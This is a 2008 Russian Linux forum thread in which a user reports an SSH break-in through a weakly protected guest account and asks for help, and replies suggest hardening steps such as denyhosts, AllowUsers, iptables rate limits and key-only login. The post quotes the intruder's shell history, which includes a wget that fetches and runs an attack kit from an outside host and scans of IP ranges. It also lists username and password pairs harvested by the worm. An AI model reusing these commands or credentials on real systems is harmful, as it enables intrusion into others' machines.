мой лялих взломали :(

0

0

Сижу значит, лор читаю. И вдруг заметил, что плохо грузиться странички стали. Посмотрел в топ и ахнул:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
28311 guest     20   0  1720  508  420 R 70.6  0.0   2:38.36 pscan2
25500 root      20   0  376m  34m 9812 S  9.8  1.7  55:58.57 Xorg

Сначало я подумал, что это что в вайне крутиться. Убил - не помогло. Потом заметил странность - юзер guest. Первым делом сменил пароль на guest (а он у меня был guest1, толи guest_guest). Однако текущая сессия не завершилась. Убивал так:

ps h -o pid -U guest | xargs sudo kill -9

Вроде отпустило, уф.

Нашел интересный тред: http://ubuntuforums.org/archive/index.php/t-253373.html

Там узнал про команду last. Меня имели целых три дня (только левые логины):

guest    pts/3   80.97.153.252    Wed Nov 26 08:00 - 23:26  (15:25)    
guest    pts/3   80.97.153.252    Wed Nov 26 05:05 - 05:41  (00:35)    
guest    pts/2   89.114.144.135   Tue Nov 25 06:42 - 06:43  (00:00)    
guest    pts/0   80.97.153.252    Tue Nov 25 05:02 - 14:54  (09:51)    
guest    pts/0   89.114.144.135   Tue Nov 25 04:58 - 05:02  (00:04)    
guest    pts/10  89.114.144.135   Mon Nov 24 19:29 - 19:30  (00:01)    
guest    pts/9   a34.csc.lv       Mon Nov 24 19:19 - 19:52  (00:33)

Запомните этих ублюдков! (поправка - беспечных пользователей лялиха)

А теперь, что творили на машине (не интересные моменты вырезаны):

$sudo cat /home/guest/.bash_history

wget members.lycos.co.uk/arnibots/vio-linux.tgz;tar xzvf vio-linux.tgz;cd .m;./bash
cd /var/tmp
ls
ls -la
wget members.lycos.co.uk/arnibots/bengos.tgz
tar xzvf bengos.tgz
cd bengos
w
ps -x
cd /var/tmp
ls
cd bengos
ls
cat nobash.txt 
cd /var/tmp/bengos
./ a 165.91
./a 165.91
./a 209.155
./a 195.85
./a 64.45

Так-с. Посмотрел файлик /var/tmp/bengos/pass.txt, среди прочего есть пара «guest guest1». Хи, хи.

Кстати, червь мне наворовал порядка двадцати адресков беспечных лялихсойдов. IP публиковать не буду, а вот логин-пароль:

$cat /var/tmp/bengos/nobash.txt | awk '{print $1 "\t" $2}'

admin	sysmail
admin	sysmail
admin	sysmail
admin	sysmail
root	beach
root	beach
root	beach
stud	stud
trash	trash
aaron	aaron123
admin	sysmail
admin	sysmail
stud	stud
trash	trash
aaron	aaron123
gt05	gt05
test	abc123

Исходники на сканер приложены, а вот на бинарь ss и sshd нет.

echo "[]  [] [] [][]   [][]    []   [][][] []  []"
echo "[] []  [] [] []  [] []  [][]  []     [] []"
echo "[][]   [] []  [] [][]  []  [] []     [][]"
echo "[] []  [] [] []  [] []  [][]  []     [] []"
echo "[]  [] [] [][]   []  []  []   [][][] []  []"
echo "[*] Scanner Made bY KidRock & The #KidRockS Team [*]"

Собственно несколько вопросов:

1. Что делать? Достаточно ли сменить пароль?

2. Как прибить пользователя (logout)? Есть ли какая команда?

P.S. Теперь и на лоре есть полужирный бибикот!

Ссылка

←	вопрос по шрифтам

Есть ли альтернатива Acronis True Image

→

← 1 2 →

Да, в толксы мне запрещено постить.

~~anonymous_num_0~~
(26.11.08 20:09:06 MSK) автор топика

Ссылка

На лоре подобное:

http://www.linux.org.ru/view-message.jsp?msgid=3057034

Привет пользователям ALTLinux, 30.08.2008

~~anonymous_num_0~~
(26.11.08 20:13:51 MSK) автор топика

Ссылка

Му-ха-ха. А что заранее не позаботился? Так же, помнится, Вилли ломанули, хуже виндузятников, йопт!

gnomino
(26.11.08 20:18:16 MSK)

Ещё советуют denyhosts:

sudo apt-get install denyhosts

DenyHosts is a python program that automatically blocks ssh attacks by adding entries to /etc/hosts.deny.

Вообщем, тут все расписано:

http://lists.altlinux.org/pipermail/community/2008-August/416047.html

~~anonymous_num_0~~
(26.11.08 20:23:03 MSK) автор топика

Ссылка

Ответ на: комментарий от gnomino 26.11.08 20:18:16 MSK

> А что заранее не позаботился?

Проблемы решаю по мере поступления.

~~anonymous_num_0~~
(26.11.08 20:23:37 MSK) автор топика

Ответ на: комментарий от anonymous_num_0 26.11.08 20:23:37 MSK

>Проблемы решаю по мере поступления.

ППЦ, не быть тебе диром по IT

gnomino
(26.11.08 20:27:29 MSK)

>пароль на guest (а он у меня был guest1, толи guest_guest)

мдааа...

>лялих

ну ты понял ;)

ubuNToo
(26.11.08 20:30:11 MSK)

Ссылка

Ответ на: комментарий от anonymous_num_0 26.11.08 20:23:37 MSK

echo 'AllowUsers user' >>/etc/ssh/sshd_config

юзеру пароль подлинее

gnomino
(26.11.08 20:33:00 MSK)

Ответ на: комментарий от gnomino 26.11.08 20:33:00 MSK

И ещё фак: http://denyhosts.sourceforge.net/faq.html#1_0

~~anonymous_num_0~~
(26.11.08 20:37:00 MSK) автор топика

Ссылка

>Что делать?

Запомнить раз и навсегда, что все диры, доступные на запись обычному юзеры, должны лежать на отдельном разделе с noexec.

AX ★★★★★
(26.11.08 20:49:57 MSK)

Ссылка

/me сидит за NAT'ом и не беспокоится из-за такой фигни ))

isden ★★★★★
(26.11.08 20:53:05 MSK)

Ответ на: комментарий от isden 26.11.08 20:53:05 MSK

хотя, все пароли >12 символов и не осмысленные. лишним юзерам доступ запрещен.

isden ★★★★★
(26.11.08 20:54:02 MSK)

Ответ на: комментарий от isden 26.11.08 20:53:05 MSK

>/me сидит за NAT'ом и не беспокоится из-за такой фигни ))

Для rm -rf $HOME этого вполне достаточно.. :)

AX ★★★★★
(26.11.08 20:55:51 MSK)

Ссылка

Ответ на: комментарий от isden 26.11.08 20:54:02 MSK

>хотя, все пароли >12 символов и не осмысленные

А у меня осмысленные:
,ekmrfleloyxbr (булькадудончик) -- например. Абсолютно не напрягает меня их осмысленность.

gnomino
(26.11.08 20:58:40 MSK)

Ответ на: комментарий от gnomino 26.11.08 20:58:40 MSK

> ,ekmrfleloyxbr

Пустило, спасибо.

Igron ★★★★★
(26.11.08 21:07:17 MSK)

Ссылка

Ответ на: комментарий от gnomino 26.11.08 20:58:40 MSK

ntnhf[kjh'nfy - это проще

~~wfrr~~ ★★☆
(26.11.08 21:07:55 MSK)

[тут было слово которое в удаленных], открыть ssh на стандартном порту, с простым именем юзера и элементарным паролем, дома у тебя наверное на входной двери только шпингалет и тот снаружи?

~~wfrr~~ ★★☆
(26.11.08 21:12:09 MSK)

Ссылка

> Scanner Made bY KidRock

Ну вот. КидРок сказал, что свои альбомы в сети будет выкладывать, а выкладывает сканеры всякие.

~~sysmouse~~ ★
(26.11.08 21:28:12 MSK)

Ссылка

Ответ на: комментарий от wfrr 26.11.08 21:07:55 MSK

>ntnhf[kjh'nfy - это проще

Это слово есть в словаре

gnomino
(26.11.08 21:37:39 MSK)

Ответ на: комментарий от gnomino 26.11.08 21:37:39 MSK

химики жгут! но можн опридумать чтонить вродже ntnhf[kjhuk.rfy которого в словаре пока нет, благо словобразование там весьма простое и пароль можно запсиать в виде GlCl₄

~~wfrr~~ ★★☆
(26.11.08 21:44:25 MSK)

Ссылка

Ещё тред:

http://www.linux.org.ru/view-message.jsp?msgid=1818184

Новости - Документация - sshguard: защита для OpenSSH - 07.03.2007

Помимо стандартного (сменить порт) советуют iptables.

iptables -A INPUT -p TCP -i eth0 --syn --dport 22 -m recent --name radiator --set
iptables -A INPUT -p TCP -i eth0 --syn --dport 22 -m recent --name radiator --update --seconds 60 --hitcount 4 -j DROP

~~anonymous_num_0~~
(26.11.08 21:45:46 MSK) автор топика

Ответ на: комментарий от gnomino 26.11.08 20:27:29 MSK

> ППЦ, не быть тебе диром по IT

Бэкапы делаю, почему то.

~~anonymous_num_0~~
(26.11.08 21:47:17 MSK) автор топика

Ссылка

Ответ на: комментарий от anonymous_num_0 26.11.08 21:45:46 MSK

толко у меня стоит --seconds 600 нормально облымывает желающий. Хотя тут меня уже месяц одновременно с нескольких десятков ий-пи брутят, получается 1-2 попытки в минуту, думаю 18 значный пароль не подберут :)

gnomino
(26.11.08 21:52:57 MSK)

Ссылка

Это не твой лялих взломали, это взломали тебя. Головой то думать надо, чтобы с такими словарными паролями попой в интернет выставлять.

> 1. Что делать? Достаточно ли сменить пароль?

Достаточно сменить пароль, удалить процессы от guest, удалить файлы в /home/guest, /tmp и /var/tmp, принадлежащих пользователю guest. Судя по файлам, тебя хотели превратить в флудобота с удалённым управлением по irc - довольно распространённый вид.

Deleted
(26.11.08 23:10:28 MSK)

Ссылка

> 2. Как прибить пользователя (logout)? Есть ли какая команда?

man pkill

Deleted
(26.11.08 23:12:16 MSK)

Ссылка

и эти люди ругают Windows Vista и журнал ксакеп..

volh ★★
(26.11.08 23:57:12 MSK)

Ответ на: комментарий от volh 26.11.08 23:57:12 MSK

разлогиниться забыл :`(

volh ★★
(26.11.08 23:57:29 MSK)

Тут надо образ мышления менять.. Иначе ничего не поможет, ни грамотные настройки iptables (в данном случае), ни более корректные пользовательские пароли.. либо что-либо ещё..

MiracleMan ★★★★★
(27.11.08 00:10:28 MSK)

Ссылка

Ответ на: комментарий от volh 26.11.08 23:57:29 MSK

А тем временем: третья звезда, выпитое пиво и орущая классическая музыка...

Соседи, простите меня.

Igron ★★★★★
(27.11.08 00:10:57 MSK)

Ответ на: комментарий от Igron 27.11.08 00:10:57 MSK

Ну че, какое ядро на моей шалке стоит?

gnomino
(27.11.08 00:27:02 MSK)

Вот они, непуганые идиоты!

Дядь, ты каким местом думал, когда голой жопой в инет высовывался!? Впредь юудешь умнее и поставишь в sshd опцию Password no, и будешь ходить только по ключам.

~~gaa~~ ★★
(27.11.08 00:29:37 MSK)

Ответ на: комментарий от gaa 27.11.08 00:29:37 MSK

не удобно эти ключи. А всяким "левым" пользователям удаленный логин надо прикрывать в любом случае

gnomino
(27.11.08 00:35:10 MSK)

Ответ на: комментарий от gnomino 27.11.08 00:35:10 MSK

> не удобно эти ключи. А всяким "левым" пользователям удаленный логин надо прикрывать в любом случае

И чем же они неудобны? Или не смотрел, но захотел что-нибудь авторитетно вякнуть?

~~gaa~~ ★★
(27.11.08 00:38:38 MSK)

Ответ на: комментарий от gnomino 27.11.08 00:27:02 MSK

> Ну че, какое ядро на моей шалке стоит?

Дефолтное, непатченное.

Igron ★★★★★
(27.11.08 00:56:02 MSK)

Ссылка

/me сидит таки за nat-ом и таки раз в неделю пускает chkrootkit

(ну что вы! конечно нет! это же не антивирус! как вы могли подумать!)

dmiceman ★★★★★
(27.11.08 05:13:12 MSK)

Ответ на: комментарий от dmiceman 27.11.08 05:13:12 MSK

Непонятно что за взлом? По ssh guest guest подобрали?

Про длинну пароля поправьте если не прав - значимы только n первых символов?

По поводу сетвой активности на десктопе - разрешить трафик для своего uid, и что ещё очень нужно. А всякие guest пусть в коробке сидят.

~~tux2002~~ ★
(27.11.08 08:52:10 MSK)

Ответ на: комментарий от gaa 27.11.08 00:38:38 MSK

>Или не смотрел, но захотел что-нибудь авторитетно вякнуть?-
Ну ситуация -- зашел ты в гости к знакомым, тут захотелось на свою тачку зайти, а ключа с собой болт, и че ты делаешь? Будешь хранить ключи где-нибудь в открытом доступе, на гмыле, например?

PS Следи за выражениями, двуздвездный ты мой.

gnomino
(27.11.08 08:59:12 MSK)

massive dnk corruption detected

~~redgremlin~~ ★★★★★
(27.11.08 09:00:34 MSK)

Ссылка

а откройте мне секрет - зачем нужен этот самый пользователь гость, да ещё и с простым паролем и с удалённым доступом? варианты с honeypot не рассматриваю, тут явно не оно.

mic ★★★★★
(27.11.08 09:10:34 MSK)

Ответ на: комментарий от mic 27.11.08 09:10:34 MSK

На фидоре по умолчанию был открыт доступ по ссш _всем_ юзерам, вполне возможно что афтар просто установил ссш ине парился настройкой.

~~wfrr~~ ★★☆
(27.11.08 09:38:08 MSK)

Ответ на: комментарий от tux2002 27.11.08 08:52:10 MSK

> Непонятно что за взлом? По ssh guest guest подобрали?

Нет, забавнее. Я в Ubuntu решил создать пользователя (или он уже был) для гостей во время моего отсутствия (чего-нибудь распечатать, к примеру). Хотел вписать guest-guest, однако, пароль должен быть не менее шести символов, потому guest1. А в словаре взломщика как раз есть пара guest-guest1.

~~anonymous_num_0~~
(27.11.08 11:17:34 MSK) автор топика

Ссылка

Ответ на: комментарий от wfrr 27.11.08 09:38:08 MSK

> На фидоре по умолчанию был открыт доступ по ссш _всем_ юзерам, вполне возможно что афтар просто установил ссш ине парился настройкой.

На Ubuntu аналогично, AllowUsers вообще нет.

Сейчас прописал доступ только себе (AllowUsers), сменил порт, поставил denyhosts. Однако, теперь в auth.log никого нет, аж скучно.

denyhosts скорее всего снесу, это ж ужас, когда демон на python. Хотя он отлавливает атаки, в отличии от iptables, который молча запретит вход.

Вообщем, мне повезло. У guest не было каких либо привелегий, ибо предназначался он для гостей. Пароль можно выставить и прежний, все равно через ssh теперь хода нет.

~~anonymous_num_0~~
(27.11.08 11:25:48 MSK) автор топика

Ссылка

Ответ на: комментарий от gnomino 27.11.08 08:59:12 MSK

>> Или не смотрел, но захотел что-нибудь авторитетно вякнуть?-
> Ну ситуация -- зашел ты в гости к знакомым, тут захотелось на свою тачку зайти, а ключа с собой болт, и че ты делаешь?

А у знакомых стоит винда и троян-кейлоггер, который отошлёт твой пароль тому же хацкеру.

> Будешь хранить ключи где-нибудь в открытом доступе, на гмыле, например?

Я что-то проупстил и флешки уже не продают?

~~gaa~~ ★★
(27.11.08 12:45:18 MSK)

Ответ на: комментарий от gaa 27.11.08 12:45:18 MSK

А троян своровать и отправить ключ не может?!

~~anonymous_num_0~~
(27.11.08 12:47:27 MSK) автор топика

Ответ на: комментарий от gaa 27.11.08 12:45:18 MSK

>Я что-то проупстил и флешки уже не продают?
По причине широкополосного безлимитного доступа в интренет у 100% знакомых флешку уже давно с собой не ношу.

>А у знакомых стоит винда и троян-кейлоггер, который отошлёт твой пароль тому же хацкеру.
А если мне на глову упадет метеорит то я вобще до знакомых не дойду. Много ты видел установленных кейлогеров у знакомых?

gnomino
(27.11.08 12:50:03 MSK)

Ответ на: комментарий от anonymous_num_0 27.11.08 12:47:27 MSK

> А троян своровать и отправить ключ не может?!

Каждый раз надо ходить к знакомым с новым ключом (зашифрованным) и после работы с ним его удалять из ~/.ssh/authorized_keys. Вот это -- путь Ъ-параноика.

~~gaa~~ ★★
(27.11.08 13:58:17 MSK)

Ответ на: комментарий от gnomino 27.11.08 12:50:03 MSK

>> А у знакомых стоит винда и троян-кейлоггер, который отошлёт твой пароль тому же хацкеру.
> А если мне на глову упадет метеорит то я вобще до знакомых не дойду. Много ты видел установленных кейлогеров у знакомых?

Винды без вирусов на домашних машинах я вообще не видел.

~~gaa~~ ★★
(27.11.08 13:58:56 MSK)

Ссылка

Ответ на: комментарий от gaa 27.11.08 13:58:17 MSK

имхо, ходить к знакомым для совершения ssh сессии - это как-то странновато =)) если уж очень приспичило - есть же ssh клиенты для КПК/коммуникаторов/смартов/телефонов..

isden ★★★★★
(27.11.08 14:09:05 MSK)